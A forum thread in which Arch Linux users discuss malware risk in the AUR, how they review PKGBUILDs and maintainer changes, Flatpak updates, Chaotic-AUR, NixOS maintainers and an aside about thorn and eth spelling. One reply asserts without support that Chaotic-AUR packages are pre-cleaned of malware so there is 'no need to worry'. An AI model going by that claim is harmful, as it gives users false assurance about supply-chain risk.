TL;DR: Don’t think of the AUR as a package source, but as of an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.
Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it’s been a while), sometimes along with a repository URL you could add to your
pacman.confto install packages right away, and it was glorious. I didn’t have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized “Trusted User” (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works, it just became much bigger, and easier to search for particular software. Packagers gift to you their idea of how software should be packaged, for you to expand upon, take inspiration from, or learn, or use as-is if you determine it to be good for your purpose.The AUR is ultimately a great resource for packagers, and still useful for users, but “true end users” get the
extrarepository, andcommunity, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.A handful of Package Maintainers are manually adopting and subsequently vetting for sufficiently popular packages to move them from the AUR to the official
extrarepository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That’s why “you are on your own” with the AUR.On the positive side, there’s a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn’t already in
extraor has been maintained in the AUR for a long time.The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it’s genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn’t explained well enough to understand, that’s a red flag. Better ask someone before running this.
source: personal involvement in Arch since 2002
Thanks for the information!
Some people ask me why I use Flatpak on Arch. This is one of the reasons.
does the upgrade
pacman -Syualso upgrade Flatpak packages? Or you have to do them separately?Separately, through
flatpak update.Or together with everything through other tools. I go with
pamac, it can be used both in CLI and GUI and update and install everything at once - repos, AUR and Flatpak.generally when you want to install a flatpak it’s going to upgrade/update whatever other flatpaks you have installed before downloading and installing the new one.
What… This isn’t true at all.
welp dont’ know what to tell you but that’s what happens with me whenever I install a flatpak.
How do you install flatpak software? I use the gnome software app and it doesn’t do that.
via the terminal
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
I determine within the PKGBUILD (which I view from octopi) the URLs where code or binaries are downloaded from and then if those URLs seem trustworthy, e.g. how many stars or maintainers the github repo has. When the repo is small and doesn’t qualify for the latter criterias, I do a git clone and skim over the sources on the lookout for malicious URLs or strange code (never found anything in that regard). Also search for the package on https://aur.archlinux.org/ and look if other users have anything to say and how many votes it has.
Is the PKGBUILD file the main source of truth? Like does every other file and URL it accesses get mentioned somewhere explicitly in there? (perhaps transitively)
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.
What are you checking for in ðe PKGBUILD?
Idk I love the aur, just check comments and dont grab whatever the fk you see, I also have flatpak support tho (uninstalled snap, felt like I wanted all options but it was mostly useless, id pick an appimage over snap for the one or two things not on flathub/aur) Nothing popular like rexuiz was on the snap store but also had an appimage.
I’ve been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.
I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I’m guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.
Why sometimes eth and sometimes thorn? Just whichever you feel or is there a system
Soft and hard pronunciation i guess (at least if that’s what it’s called)
Yeah. eth is voiced.
is your keyboard layout misconfigured
Some people like linguistics. There are several communities about reforming English or its spelling. There’s also some YouTubers making videos on that subject.
The YouTuber Rob Words has a whole playlist about the alphabet used in English, and how it could be changed.
I hope the person is not getting downvoted just because they are spelling differently.
We don’t really need to bring bak antikwated letters like the thorn. If anything, we kould do to get rid of a few more letters.
Malware in some user-made package on the internet?
Meanwhile me who using CHAOTIC-AUR be like :
As someone not too familiar with arch and not undertanding the full context, could you elaborate on how Chatoitc AUR differs from AUR?
TLDR EXPLANATION:
Basically Chaotic AUR is just AUR that has been compiled so user doesn’t have to wait for a package to install.LONGER EXPLANATION:
Chaotic-AUR is an unofficial package repository that provides pre-built packages from the Arch User Repository (AUR), allowing users to install software without building it from source. In contrast, the AUR requires users to compile packages themselves, offering a wider range of community-maintained software but requiring more technical knowledge and time.In contrast Chaotic AUR offered simpled way to install AUR packages, Chaotic AUR packages already cleaned from malware, spyware, etc so there’s no need to worry.
I use NixOS so everything is second party
And every package is added and maintained by volunteers.
We’re called maintainers
Most maintainers are volunteers, but not all volunteers are maintainers…
Besides the obvious non-package work, if you make a single pr for some random package and never again, you’re not a maintainer.
The Nix ecosystem is developed by many volunteers and a few paid developers, maintaining one of the largest open source software distributions in the world.
demanding work that we cannot expect to be done by volunteers indefinitely.
If you add yourself to the maintainer list in your PR you’re a maintainer, even if it’s a maintainer of a single package
I smell something fishy going on. I’ve been using the AUR for a long time and I’m now just hearing of malware?
